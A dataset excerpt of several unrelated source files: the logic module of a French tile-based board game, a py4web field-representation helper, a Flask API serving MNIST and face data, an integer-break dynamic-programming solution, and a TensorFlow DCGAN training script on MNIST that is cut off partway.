escalier\"\"\"\n if infoPion[numeroPion][0] not in dicEsc.values():\n return\n\n # Liste des positions occupées\n valeursDico = list(infoPion.values())\n positionOccupee = [valeursDico[i][0] for i in range(len(valeursDico)) if i + 1 not in listeGagnants]\n\n # Vérification que la case n'est pas occupée\n if dicEsc[infoPion[numeroPion][0]] in positionOccupee:\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n\n # Si toutes les conditions sont validées, on effectue le changement de position\n infoPion[numeroPion] = [dicEsc[infoPion[numeroPion][0]], infoPion[numeroPion][0]]\n return\n\ndef activerVortex(numeroPion, dicVortex, infoPion, modeVortex, vortexActif, listeGagnants = []):\n \"\"\"Active le \"mode vortex\" à l'aide de la touche v pendant lequel il est possible de choisir un vortex.\n Si un vortex a été choisi avec selectVortex(), on se téléporte à la bonne position.\n Sinon, il ne se passe rien et on sort du mode vortex.\"\"\"\n if modeVortex == [0]:\n modeVortex[0] = 1\n selectVortex(vortexActif, dicVortex, numeroPion)\n return\n\n if modeVortex == [1] and vortexActif == [0]:\n modeVortex[0] = 0\n return\n\n if vortexActif != [0]:\n # Liste des positions occupées\n valeursDico = list(infoPion.values())\n positionOccupee = [valeursDico[i][0] for i in range(len(valeursDico)) if i + 1 not in listeGagnants]\n # Vérification que la case n'est pas occupée\n if dicVortex[numeroPion][vortexActif[0]-1] in positionOccupee:\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n # Si toutes les conditions sont validées, on effectue le changement de position\n infoPion[numeroPion] = [dicVortex[numeroPion][vortexActif[0]-1], infoPion[numeroPion][0]]\n # On remet à 0 les variables des vortex\n modeVortex[0] = 0\n vortexActif[0] = 0\n return\n\ndef selectVortex(vortexActif, dicVortex, numeroPion):\n \"\"\"En appuyant sur la touche b, on fait rouler le vortex sur lequel on souhaite se téléporter. 
En appuyant deux fois, on revient à 0, ce qui permet de ne pas se téléporter.\"\"\"\n vortexActif[0] = (vortexActif[0] + 1) % (len(dicVortex[numeroPion]) + 1)\n return\n\ndef activerModeTelekinesie(infoPion, telekinesieIndexTuileActive, tuilesPosees, modeTelekinesie, matriceTerrain, matriceTuiles, mursVer, mursHor, tuilesRestantes, dicEsc, dic2, dic7, dicVortex, telekinesiesRestantes):\n \"\"\"Active le mode de sélection de la case sur laquelle on veut utiliser la télékinésie\"\"\"\n if matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]] not in ('exp1', 'exp2', 'exp3', 'exp4'):\n return\n \n if modeTelekinesie == [0]:\n modeTelekinesie[0] = 1\n selectTuileTelekinesie(telekinesieIndexTuileActive, tuilesPosees, matriceTuiles, infoPion, mursVer, mursHor, matriceTerrain)\n return\n\n if modeTelekinesie == [1] and telekinesieIndexTuileActive == [0]:\n modeTelekinesie[0] = 0\n return\n\n if telekinesieIndexTuileActive != [0]:\n pionSurExploration(matriceTerrain, matriceTuiles, mursVer, mursHor, infoPion, tuilesRestantes, dicEsc, dic2, dic7, dicVortex, tuilesPosees, False, telekinesieIndexTuileActive, modeTelekinesie, telekinesiesRestantes)\n modeTelekinesie[0] = 0\n return\n\ndef selectTuileTelekinesie(telekinesieIndexTuileActive, tuilesPosees, matriceTuiles, infoPion, mursVer, mursHor, matriceTerrain):\n \"\"\"Passe à la case suivante lors du choix pendant la télékinésie\"\"\"\n telekinesieIndexTuileActive[0] = telekinesieIndexTuileActive[0]+1 if len(tuilesPosees) > telekinesieIndexTuileActive[0]+1 else 0\n \n if not tuileValide(tuilesPosees[telekinesieIndexTuileActive[0]], int(matriceTuiles[infoPion[3][0][0]][infoPion[3][0][1]][0]), infoPion, matriceTuiles, tuilesPosees, matriceTerrain, mursVer, mursHor):\n selectTuileTelekinesie(telekinesieIndexTuileActive, tuilesPosees, matriceTuiles, infoPion, mursVer, mursHor, matriceTerrain)\n return\n\ndef miniTuile(matriceTuiles):\n \"\"\"Fournit la matrice simplifiée déduite de matriceTuiles\"\"\"\n mini = [['$' for i in range(14)] for j in range(14)]\n for ligneMini in range(len(mini)):\n for colonneMini in range(len(mini[0])):\n ligneGrand = (ligneMini*4)+colonneMini-7\n colonneGrand = (colonneMini*4)-ligneMini+5\n \n if 0 <= ligneGrand < 50 and 0 <= colonneGrand < 50:\n if matriceTuiles[ligneGrand][colonneGrand] != '$':\n mini[ligneMini][colonneMini] = matriceTuiles[ligneGrand][colonneGrand]\n return mini\n\ndef detecterIntegrite(miniMatrice, positionASuppr, nbTuilesPosees):\n \"\"\"Evalue si le fait de retirer une tuile du terrain le coupe en 2 ou non\"\"\"\n casesVisitees = set()\n matriceTronquee = list(map(list, miniMatrice))\n matriceTronquee[positionASuppr[0]][positionASuppr[1]] = \"$\"\n nbTuilesApres = len(detecterIntegriteRec(matriceTronquee, 6, 6, casesVisitees))\n if (nbTuilesPosees - 1) == nbTuilesApres:\n return True, casesVisitees\n return False, 0\n\ndef detecterIntegriteRec(matrice,i, j, casesVisitees):\n \"\"\"Fonction recursive associée à la fonction précédente\"\"\"\n casesVisitees.add((i, j))\n for (p, q) in {(i - 1, j), (i, j + 1), (i + 1, j), (i, j - 1)}:\n if p in range(0, len(matrice)) and q in range(0, len(matrice[0])):\n if matrice[p][q] != \"$\" and (p, q) not in casesVisitees:\n detecterIntegriteRec(matrice, p, q, casesVisitees)\n return casesVisitees\n\ndef tuileAccessible(idTuile, ensembleTuile, matriceTerrain, matriceTuiles, mursVer, mursHor):\n \"\"\"indique si la tuile possède au moins un accès à une tuile de l'ensemble\"\"\"\n # Commencons par trouver les coordonnées de la tuile idTuile\n HG = None\n for ligne in 
range(len(matriceTuiles)):\n for colonne in range(len(matriceTuiles)):\n if matriceTuiles[ligne][colonne] != \"$\":\n if int(matriceTuiles[ligne][colonne][0]) == idTuile and HG == None:\n HG = (ligne, colonne)\n \n # Déduisons-en les coordonnées des sorties :\n listeSortie = [[0, 2], [2, 3], [3, 1], [1, 0]]\n for i in range(len(listeSortie)):\n listeSortie[i][0] += HG[0]\n listeSortie[i][0] += HG[1]\n \n # trouvons les coordonnées des murs correspondant dans leur matrices respectives\n listeMurSortie = [[0, 0], [0, 1], [1, 0], [0, 0]]\n for i in range(len(listeMurSortie)):\n listeMurSortie[i][0] += listeSortie[i][0]\n listeMurSortie[i][1] += listeSortie[i][1]\n \n # trouvons les coordonnées des cases derrière les murs respectivment\n listeCaseSortie = [[-1, 0], [0, 1], [1, 0], [0, -1]]\n for i in range(len(listeMurSortie)):\n if listeCaseSortie[i][0]+listeSortie[i][0] in range(0,50):\n listeCaseSortie[i][0] += listeSortie[i][0]\n else:\n listeCaseSortie[i][0] = 0\n if listeCaseSortie[i][1]+listeSortie[i][1] in range(0,50):\n listeCaseSortie[i][1] += listeSortie[i][1]\n else:\n listeCaseSortie[i][1] = 0\n \n # trouvons les id des Tuiles de listeCaseSortie\n listeIdTuiles = [0]*4\n for i, coor in enumerate(listeCaseSortie):\n if coor != 0: \n ligne, colonne = coor\n if matriceTuiles[ligne][colonne][0] != '$':\n listeIdTuiles[i] = int(matriceTuiles[ligne][colonne][0])\n else :\n listeIdTuiles[i] = '$'\n \n # trouvons lesquelles de ces cases sont accessibles\n listeConnection = list()\n for i in range(len(listeMurSortie)):\n if not i%2:\n if not mursHor[listeMurSortie[i][0]][listeMurSortie[i][1]]:\n listeConnection.append(listeIdTuiles[i])\n else:\n if not mursVer[listeMurSortie[i][0]][listeMurSortie[i][1]]:\n listeConnection.append(listeIdTuiles[i])\n \n for elem in listeConnection:\n if not elem in ensembleTuile:\n listeConnection.remove(elem)\n \n if len(listeConnection) > 0:\n return True\n return False\n \n \n\ndef tuileValide(tuileAValider, tuileDActivation, infoPion, matriceTuiles, tuilesPosees, matriceTerrain, mursVer, mursHor):\n \"\"\"\n Prend une tuile en entrée et renvoie True ou False si on a le droit ou non d'utiliser la télékinésie dessus\n \"\"\"\n if tuileAValider == tuileDActivation:\n return False\n \n if tuileAValider == 0:\n return True\n \n if tuileAValider == 1:\n return False\n \n # Vérif que la case est vide\n sequence = [i for i in range(1,8)]\n if pionSurTuile(matriceTuiles, sequence, tuileAValider, infoPion):\n return False\n \n # Vérification qu'on ne coupe pas le terrain\n # étape 1 au niveau des tuiles (continuité)\n tuilesContinue = False\n miniMatriceTuile = miniTuile(matriceTuiles)\n \n # for i in range(len(miniMatriceTuile)):\n # print(miniMatriceTuile[i])\n \n # Trouvons les coordonnées de la tuile dans la mini matrice\n for ligne in range(len(miniMatriceTuile)):\n for colonne in range(len(miniMatriceTuile[0])):\n if miniMatriceTuile[ligne][colonne] != '$':\n #print(\"tuileAValider =\", tuileAValider)\n if int(miniMatriceTuile[ligne][colonne][0]) == tuileAValider:\n coor = (ligne, colonne)\n # print(\"coor\",coor)\n tuilesContinue, ensembleCoorTuile = detecterIntegrite(miniMatriceTuile, coor, len(tuilesPosees)-1)\n if not tuilesContinue:\n return False\n \n # # au niveau des murs\n # # création de l'ensembleTuile\n # ensembleTuile = set()\n # for elem in ensembleCoorTuile:\n # ensembleTuile.add(int(miniMatriceTuile[elem[0]][elem[1]][0]))\n \n # for tuile in ensembleTuile:\n # connection = tuileAccessible(tuile, ensembleTuile, matriceTerrain, matriceTuiles, 
mursVer, mursHor)\n # if not connection:\n # print(\"tuile non accessible\", tuileAValider)\n # return False\n \n return True\n \ndef telekinesie(matriceTerrain, matriceTuiles, idTuile, dicEsc, dicVortex, telekinesiesRestantes):\n \"\"\"Modifie la matriceTerrain et la matriceTuile de manière à réaliser \n l'action de télékinésie en supprimmant l'ancienne position de la tuile déplacée\"\"\"\n # On commence par rechercher la position (HG) de la tuile à déplacer dans matriceTuile\n telekinesiesRestantes[0] = telekinesiesRestantes[0] - 1\n HG = None\n for ligne in range(len(matriceTuiles)):\n for colonne in range(len(matriceTuiles[0])):\n if matriceTuiles[ligne][colonne][0] != \"$\":\n if int(matriceTuiles[ligne][colonne][0]) == idTuile and HG == None:\n HG = (ligne, colonne)\n break\n # Ensuite, il nous faut extraire les données de cette tuile (elle est supposée vide de pions)\n for ligne in range(4):\n for colonne in range(4):\n if type(matriceTerrain[ligne+HG[0]][colonne+HG[1]]) is str:\n if matriceTerrain[ligne+HG[0]][colonne+HG[1]][:-1] == 'vortex':\n dicVortex[int(matriceTerrain[ligne+HG[0]][colonne+HG[1]][-1])].remove((ligne+HG[0], colonne+HG[1]))\n matriceTerrain[ligne+HG[0]][colonne+HG[1]] = None\n matriceTuiles[ligne+HG[0]][colonne+HG[1]] = \"$\"\n if (ligne+HG[0], colonne+HG[1]) in dicEsc.keys():\n dicEsc.pop((ligne+HG[0], colonne+HG[1]))\n \ndef pionSurTuile(matriceTuiles, sequencePion, idTuile, infoPion):\n \"\"\"renvoie True si l’un des pions de la sequence se trouve sur la Tuile idTuile\"\"\"\n # Trouvons la position HG de la tuile\n if idTuile == 0:\n return False\n HG = None\n for ligne in range(len(matriceTuiles)):\n for colonne in range(len(matriceTuiles)):\n if matriceTuiles[ligne][colonne][0] != \"$\":\n a = int(matriceTuiles[ligne][colonne][0])\n if a == idTuile and HG == None:\n HG = (ligne, colonne)\n break\n # Regardons maintenant si un pion se trouve sur cette tuile\n for pion in sequencePion:\n if pion in infoPion.keys():\n positionPion = infoPion[pion][0]\n if HG[0] <= positionPion[0] and positionPion[0] <= HG[0]+3 and HG[1] <= positionPion[1] and positionPion[1] <= HG[1]+3:\n return True\n return False\n\ndef finPartie(partieGagnee, partiePerdue):\n \"\"\"Affichage de l'écran de fin\"\"\"\n \n if partiePerdue:\n tk.efface('chronometre')\n tk.texte(100, 100, \"Temps écoulé\", taille = 30, couleur = 'red')\n tk.mise_a_jour()\n \n if partieGagnee:\n tk.efface('sortie')\n tk.efface('chronometre')\n tk.texte(100, 100, \"Vous avez gagné !\", taille = 30, couleur = 'light green')\n tk.mise_a_jour()\n\ndef verifVictoire(listeGagnants):\n \"\"\"Renvoie True si la partie est gagnée\"\"\"\n if len(listeGagnants) == 4:\n sleep(1)\n return True\n return False\n\ndef sauvegarderPartie(matriceTerrain, infoPion, nb_joueurs, sortieActive, tempsRestant, touchesPartie, touchesPartieParJoueur, listeGagnants, matriceTuiles, mursVer, mursHor, tuilesPosees, dicVortex, dicEsc, telekinesiesRestantes):\n \"\"\" Sauvegarde et quitte la partie \"\"\"\n with open(\"save.txt\", \"w\") as save:\n # Enregistrement matriceTerrain\n for i in range(len(matriceTerrain)):\n ligne = []\n for element in matriceTerrain[i]:\n ligne.append(str(element))\n save.write(\" \".join(ligne)+\"\\n\")\n save.write(\"\\n\")\n \n # Enregistrement infoPion\n data_infoPion = infoPion.items()\n for cleValeur in data_infoPion:\n ligne = []\n ligne.append(str(cleValeur[0]))\n for couple in cleValeur[1]:\n chaine = []\n for element in couple:\n chaine.append(str(element))\n chaine = \",\".join(chaine)\n 
ligne.append(chaine)\n save.write(\" \".join(ligne)+\"\\n\")\n save.write('\\n')\n \n # nb_joueurs, sortieActive, tempsRestant\n save.write(str(nb_joueurs)+\"\\n\\n\"+str(sortieActive)+\"\\n\\n\"+str(tempsRestant)+\"\\n\")\n \n # touchesPartie\n data_touchesPartie = touchesPartie.items()\n for cleValeur in data_touchesPartie:\n ligne = []\n ligne. append(cleValeur[0])\n for valeur in cleValeur[1]:\n if valeur is tuple:\n chaine = []\n for element in valeur:\n chaine.append(str(element))\n chaine = \",\".join(chaine)\n ligne.append(chaine)\n else:\n ligne.append(str(valeur))\n save.write(\" \".join(ligne)+\"\\n\")\n save.write('\\n')\n \n # touchesPartieParJoueur\n data_touchesPartieParJoueur = touchesPartieParJoueur.items()\n for cleValeur1 in data_touchesPartieParJoueur:\n data_dico = cleValeur1[1].items()\n for cleValeur2 in data_dico:\n ligne = [str(cleValeur1[0])]\n ligne.append(str(cleValeur2[0]))\n ligne.append(str(cleValeur2[1]))\n save.write(' '.join(ligne)+'\\n')\n save.write('\\n')\n \n \n #listeGagnants\n for element in listeGagnants:\n save.write(str(element)+\"\\n\")\n save.write('\\n')\n \n # matriceTuiles\n for ligne in range(len(matriceTuiles)):\n chaine = \"\"\n for colonne in range(len(matriceTuiles)):\n chaine += matriceTuiles[ligne][colonne] + ' '\n chaine += '\\n'\n save.write(chaine)\n save.write('\\n')\n \n # mursVer\n for ligne in range(len(mursVer)):\n chaine = ''\n for colonne in range(len(mursVer[0])):\n chaine += str(mursVer[ligne][colonne])+' '\n chaine += '\\n'\n save.write(chaine)\n save.write('\\n')\n \n # mursHor\n for ligne in range(len(mursHor)):\n chaine = ''\n for colonne in range(len(mursHor[0])):\n chaine += str(mursHor[ligne][colonne])+' '\n chaine += '\\n'\n save.write(chaine)\n save.write('\\n')\n \n # tuilesPosees\n chaine = ''\n for element in tuilesPosees:\n chaine += str(element)+' '\n save.write(chaine)\n save.write('\\n\\n')\n \n # dicVortex\n for key, value in dicVortex.items():\n chaine = str(key)+':'\n for couple in value:\n chaine += str(couple[0])+','+str(couple[1])+' '\n chaine += '\\n'\n save.write(chaine)\n save.write('\\n')\n \n # dicEsc\n for key, value in dicEsc.items():\n chaine = str(key[0])+','+str(key[1])+':'+str(value[0])+','+str(value[1])+'\\n'\n save.write(chaine)\n \n # telelekinesiesRestantes\n save.write('\\n'+str(telekinesiesRestantes[0]))\n \n \n \n tk.ferme_fenetre()\n \ndef chargerPartie():\n \"\"\"Charge la partie, de manière à pouvoir continuer la dernière sauvegarde\"\"\"\n with open('save.txt','r') as save:\n data_save = save.read()\n \n data_save = data_save.split('\\n')\n \n # matriceTerrain\n compteur = 0\n while data_save[compteur] != '':\n compteur += 1 \n \n matriceTerrain = []\n for ligne in data_save[:compteur]:\n ligne = ligne.split(' ')\n for i in range(len(ligne)):\n if ligne[i] == '1' or ligne[i] == '0':\n ligne[i] = int(ligne[i])\n elif ligne[i] == 'None':\n ligne[i] = None\n else:\n ligne[i]\n matriceTerrain.append(ligne)\n \n # infoPion\n debut = compteur+1\n compteur += 1\n while data_save[compteur] != '':\n compteur += 1\n \n infoPion = dict()\n for ligne in data_save[debut:compteur]:\n ligne = ligne.split(' ')\n infoPion[int(ligne[0])] = [[int(ligne[1].split(',')[0]), int(ligne[1].split(',')[1])], [int(ligne[2].split(',')[0]), int(ligne[2].split(',')[1])]]\n \n # nb_joueurs, sortieActive, tempsRestant\n compteur += 1\n nb_joueurs = int(data_save[compteur])\n compteur += 2\n sortieActive = True if data_save[compteur] == 'True' else False\n compteur += 2 \n tempsRestant = 
float(data_save[compteur])\n compteur += 1 \n \n # touchesPartie \n touchesPartie = dict()\n debut = compteur\n while data_save[compteur] != '':\n compteur += 1\n for ligne in data_save[debut:compteur]:\n ligne = ligne.split()\n if ligne[0] == 'vortex':\n touchesPartie.setdefault('vortex', None)\n touche = \" \".join(ligne[1:3]).strip(\"(')\").split(\"', '\")\n touchesPartie[\"vortex\"] = (tuple(touche), int(ligne[3]))\n else :\n touchesPartie[ligne[0]] = (ligne[1], int(ligne[2]))\n \n # touchesPartieParJoueur\n touchesPartieParJoueur = dict()\n compteur += 1\n debut = compteur\n while data_save[compteur] != '':\n compteur += 1\n for ligne in data_save[debut:compteur]:\n ligne = ligne.split()\n if ligne[1] == 'vortex' :\n if touchesPartieParJoueur.get(int(ligne[0])) == None:\n touchesPartieParJoueur.setdefault(int(ligne[0]), dict())\n touchesPartieParJoueur[int(ligne[0])]['vortex'] = tuple(\" \".join(ligne[2:4]).strip(\"(')\").split(\"', '\"))\n \n elif ligne[1] == 'elfe' :\n if touchesPartieParJoueur.get(int(ligne[0])) == None:\n touchesPartieParJoueur.setdefault(int(ligne[0]), dict())\n touchesPartieParJoueur[int(ligne[0])]['elfe'] = tuple(\" \".join(ligne[2:4]).strip(\"(')\").split(\"', '\"))\n \n else:\n if touchesPartieParJoueur.get(int(ligne[0])) == None:\n touchesPartieParJoueur.setdefault(int(ligne[0]), dict())\n touchesPartieParJoueur[int(ligne[0])][ligne[1]] = ligne[2]\n compteur += 1 \n \n # listeGagnants\n listeGagnants = list()\n debut = compteur\n while data_save[compteur] != '':\n compteur += 1\n for ligne in data_save[debut:compteur]:\n if ligne != '':\n listeGagnants.append(int(ligne))\n compteur += 1\n \n # matriceTuiles\n matriceTuiles = []\n debut = compteur\n while data_save[compteur] != '':\n compteur += 1\n for ligne in data_save[debut:compteur]:\n ligne = ligne.strip().split(' ')\n matriceTuiles.append(ligne)\n compteur += 1\n \n \n # mursVer\n mursVer = list()\n debut = compteur\n while data_save[compteur] != '':\n compteur += 1\n for ligne in data_save[debut:compteur]:\n ligne = list(map(lambda x: int(x), ligne.strip().split()))\n mursVer.append(ligne)\n compteur += 1\n \n \n # mursHor\n mursHor = list()\n debut = compteur\n while data_save[compteur] != '':\n compteur += 1\n for ligne in data_save[debut:compteur]:\n ligne = list(map(lambda x: int(x), ligne.strip().split()))\n mursHor.append(ligne)\n compteur += 1\n \n # tuilesPosees\n tuilesPosees = list(map(lambda x: int(x) ,data_save[compteur].strip().split(' ')))\n compteur += 2\n \n \n # dicVortex\n debut = compteur\n while data_save[compteur] != '':\n compteur += 1\n dicVortex = dict()\n for ligne in data_save[debut:compteur]:\n ligne = ligne.strip().split(':')\n dicVortex.setdefault(int(ligne[0]), list())\n couples = ligne[1].split(' ')\n for duo in couples:\n nombre1 = int(duo.split(',')[0])\n nombre2 = int(duo.split(',')[1])\n dicVortex[int(ligne[0])].append((nombre1, nombre2))\n compteur += 1\n\n \n # dicEsc\n debut = compteur\n while data_save[compteur] != '':\n compteur += 1\n dicEsc = dict()\n for ligne in data_save[debut:compteur]:\n ligne = ligne.strip().split(':')\n liste = []\n for couple in ligne:\n couple = couple.split(',')\n nombre1 = int(couple[0])\n nombre2 = int(couple[1])\n liste.append((nombre1, nombre2))\n dicEsc[liste[0]] = liste[1]\n compteur += 1\n \n # telekinesiesRestantes\n telekinesiesRestantes = [int(data_save[compteur].strip())]\n \n return matriceTerrain, infoPion, nb_joueurs ,sortieActive , tempsRestant, touchesPartie, touchesPartieParJoueur, listeGagnants, matriceTuiles, 
mursVer, mursHor, tuilesPosees, dicVortex, dicEsc, telekinesiesRestantes\n","sub_path":"moduleLogique.py","file_name":"moduleLogique.py","file_ext":"py","file_size_in_byte":52542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"312734863","text":"def count_expected_args(f):\n if hasattr(f,'func_code'):\n # python 2\n n = f.func_code.co_argcount - len(f.func_defaults or [])\n if getattr(f, 'im_self', None):\n n -= 1\n elif hasattr(f, '__code__'):\n # python 3\n n = f.__code__.co_argcount - len(f.__defaults__ or [])\n if getattr(f, '__self__', None):\n n -= 1\n else:\n # doh!\n n = 1\n return n\n\ndef represent(field, value, record):\n f = field.represent\n if not callable(f):\n return str(value)\n n = count_expected_args(f)\n if n == 1:\n return f(value)\n elif n == 2:\n return f(value, record)\n else:\n raise RuntimeError(\"field representation must take 1 or 2 args\")\n","sub_path":"py4web/utils/dbrepresent.py","file_name":"dbrepresent.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"500416702","text":"from flask import Flask, request, send_from_directory, jsonify\nfrom flask_cors import CORS\nfrom mnist_handlers import sort_pc, fetch_rnd_digit, load_data\nfrom faces_handlers import fetch_rnd_img\n\nfrom keras.models import Model, load_model\nimport numpy as np\nimport tensorflow as tf\n\nfrom constants.constants import mnist_pc_order, mnist_min, mnist_max, mnist_step, faces_pc_order, faces_min, faces_max, faces_step\n\n#====SETUP=====\nmnist_data = None\nprint(\"Starting server..\")\napp = Flask(__name__,static_folder=\"\",static_url_path='')\nCORS(app)\n\n@app.route('/')\ndef fetch_model(path):\n return app.send_static_file(path)\n\n#========= Methods for mnist methods =========\ndef load_mnist_data():\n global mnist_data\n mnist_data = np.load(\"./data/mnist/mnist_data.npy\")\n\n@app.route('/api/mnist/fetch-pc-info',methods=[\"GET\"])\ndef fetch_mnist_min_max_step():\n d = {}\n d[\"order\"] = mnist_pc_order\n d[\"min\"] = mnist_min\n d[\"max\"] = mnist_max\n d[\"step\"] = mnist_step\n return jsonify(d)\n\n@app.route('/api/mnist/fetch-digit',methods=[\"GET\"])\ndef fetch_digit():\n digit = fetch_rnd_digit(mnist_data)\n return jsonify(digit)\n'''\n@app.route('/api/mnist/fetch-pc-order',methods=[\"GET\"])\ndef fetch_pc_order():\n return jsonify(mnist_pc_order)\n'''\n#========= Methods for faces methods =========\n@app.route('/api/faces/fetch-face',methods=[\"GET\"])\ndef fetch_face():\n face = fetch_rnd_img()\n return jsonify(face)\n\n@app.route('/api/faces/fetch-pc-info',methods=[\"GET\"])\ndef fetch_faces_pc_info():\n d = {}\n d[\"order\"] = faces_pc_order\n d[\"min\"] = faces_min\n d[\"max\"] = faces_max\n d[\"step\"] = faces_step\n return jsonify(d)\n\n#Load data into variable....\nprint(\"Loading mnist data...\")\nload_mnist_data()\n#===============\n","sub_path":"model_api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"167243018","text":"class Solution(object):\n def integerBreak(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n #define DP[k] is the optimal for k\n DP = [0] * (n+1)\n for i in range(2,n+1):\n for j in range(1,i): #last divide\n DP[i] = max(DP[j]*(i-j), DP[i], j*(i-j)) #break the last divide or not\n return DP[n]\n","sub_path":"Integer-Break.py","file_name":"Integer-Break.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"585754318","text":"import os, time, itertools, imageio, pickle\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nimport cv2, time\r\nfrom sklearn.datasets import fetch_mldata\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.utils import shuffle\r\n\r\nclass DCGAN():\r\n def __init__(self):\r\n self.history = {'train_D_loss': [], 'train_G_loss': [], 'val_D_loss': [], 'val_G_loss': []}\r\n\r\n def lrelu(self, x, th=0.2):\r\n return tf.maximum(th * x, x)\r\n\r\n # G(z)\r\n def generator(self, x, isTrain=True, reuse=False):\r\n print('---------- build generator ---------')\r\n with tf.variable_scope('generator', reuse=reuse):\r\n # 1st hidden layer\r\n conv1 = tf.layers.conv2d_transpose(x, 1024, [4, 4], strides=(1, 1), padding='valid')\r\n lrelu1 = self.lrelu(tf.layers.batch_normalization(conv1, training=isTrain), 0.2)\r\n\r\n # 2nd hidden layer\r\n conv2 = tf.layers.conv2d_transpose(lrelu1, 512, [4, 4], strides=(2, 2), padding='same')\r\n lrelu2 = self.lrelu(tf.layers.batch_normalization(conv2, training=isTrain), 0.2)\r\n\r\n # 3rd hidden layer\r\n conv3 = tf.layers.conv2d_transpose(lrelu2, 256, [4, 4], strides=(2, 2), padding='same')\r\n lrelu3 = self.lrelu(tf.layers.batch_normalization(conv3, training=isTrain), 0.2)\r\n\r\n # 4th hidden layer\r\n conv4 = tf.layers.conv2d_transpose(lrelu3, 128, [4, 4], strides=(2, 2), padding='same')\r\n lrelu4 = self.lrelu(tf.layers.batch_normalization(conv4, training=isTrain), 0.2)\r\n\r\n # output layer\r\n conv5 = tf.layers.conv2d_transpose(lrelu4, 1, [4, 4], strides=(2, 2), padding='same')\r\n o = tf.nn.tanh(conv5)\r\n\r\n return o\r\n\r\n # D(x)\r\n def discriminator(self, x, isTrain=True, reuse=False):\r\n if not reuse:\r\n print('---------- build discriminator ---------')\r\n with tf.variable_scope('discriminator', reuse=reuse):\r\n # 1st hidden layer\r\n conv1 = tf.layers.conv2d(x, 128, [4, 4], strides=(2, 2), padding='same')\r\n lrelu1 = self.lrelu(conv1, 0.2)\r\n\r\n # 2nd hidden layer\r\n conv2 = tf.layers.conv2d(lrelu1, 256, [4, 4], strides=(2, 2), padding='same')\r\n lrelu2 = self.lrelu(tf.layers.batch_normalization(conv2, training=isTrain), 0.2)\r\n\r\n # 3rd hidden layer\r\n conv3 = tf.layers.conv2d(lrelu2, 512, [4, 4], strides=(2, 2), padding='same')\r\n lrelu3 = self.lrelu(tf.layers.batch_normalization(conv3, training=isTrain), 0.2)\r\n\r\n # 4th hidden layer\r\n conv4 = tf.layers.conv2d(lrelu3, 1024, [4, 4], strides=(2, 2), padding='same')\r\n lrelu4 = self.lrelu(tf.layers.batch_normalization(conv4, training=isTrain), 0.2)\r\n\r\n # output layer\r\n conv5 = tf.layers.conv2d(lrelu4, 1, [4, 4], strides=(1, 1), padding='valid')\r\n o = tf.nn.sigmoid(conv5)\r\n\r\n return o, conv5\r\n\r\n def fit(self, num_epoch=100, batch_size=30, lr=0.0001):\r\n x = tf.placeholder(tf.float32, shape=(None, 64, 64, 1))\r\n z = tf.placeholder(tf.float32, shape=(None, 1, 1, 100))\r\n isTrain = tf.placeholder(tf.bool)\r\n\r\n # networks : generator\r\n G_z = self.generator(z, isTrain)\r\n\r\n # networks : discriminator\r\n D_real, D_real_logits = self.discriminator(x, isTrain)\r\n D_fake, D_fake_logits = self.discriminator(G_z, isTrain, reuse=True)\r\n\r\n # loss for each network\r\n D_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_real_logits, labels=tf.ones([batch_size, 1, 1, 1])))\r\n D_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake_logits, labels=tf.zeros([batch_size, 1, 1, 1])))\r\n D_loss = D_loss_real + D_loss_fake\r\n 
G_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake_logits, labels=tf.ones([batch_size, 1, 1, 1])))\r\n\r\n # trainable variables for each network\r\n T_vars = tf.trainable_variables()\r\n D_vars = [var for var in T_vars if var.name.startswith('discriminator')]\r\n G_vars = [var for var in T_vars if var.name.startswith('generator')]\r\n\r\n # optimizer for each network\r\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\r\n D_optim = tf.train.AdamOptimizer(lr, beta1=0.5).minimize(D_loss, var_list=D_vars)\r\n G_optim = tf.train.AdamOptimizer(lr, beta1=0.5).minimize(G_loss, var_list=G_vars)\r\n\r\n # prepare data\r\n mnist = fetch_mldata('MNIST original', data_home='.')\r\n mnist_data = np.reshape(mnist.data, (-1, 28, 28))\r\n use_data = np.empty(shape=(70000, 64, 64))\r\n for itr in range(len(mnist_data)):\r\n use_data[itr] = cv2.resize(mnist_data[itr], (64, 64)).astype(np.float) / 255\r\n use_data = use_data[:, :, :, np.newaxis]\r\n print(use_data.shape)\r\n X_trainval, X_test, y_trainval, y_test = train_test_split(use_data, mnist.target, test_size=0.001)\r\n X_train, X_val, y_train, y_val = train_test_split(X_trainval, y_trainval, test_size=0.001)\r\n\r\n print(X_train.shape, X_val.shape, X_test.shape)\r\n num_batch = len(X_train) // batch_size\r\n\r\n # open session and initialize all variables\r\n sess = tf.Session()\r\n sess.run(tf.global_variables_initializer())\r\n\r\n print()\r\n print('Start Training!')\r\n for epoch in range(num_epoch):\r\n X_ = shuffle(X_train)\r\n start_time = time.time()\r\n for batch in range(num_batch):\r\n start = batch * batch_size\r\n end = start + batch_size\r\n\r\n\r\n z_ = np.random.normal(0, 1, (batch_size, 1, 1, 100))\r\n d_loss, d_optim = sess.run([D_loss, D_optim], feed_dict={x: X_[start:end], z: z_, isTrain: True})\r\n self.history['train_D_loss'].append(d_loss)\r\n\r\n z_ = np.random.normal(0, 1, (batch_size, 1, 1, 100))\r\n g_loss, g_optim = sess.run([G_loss, G_optim], feed_dict={x: X_[start:end], z: z_, isTrain: True})\r\n self.history['train_G_loss'].append(g_loss)\r\n\r\n elapsed_time = time.time() - start_time\r\n\r\n d_loss_sum = 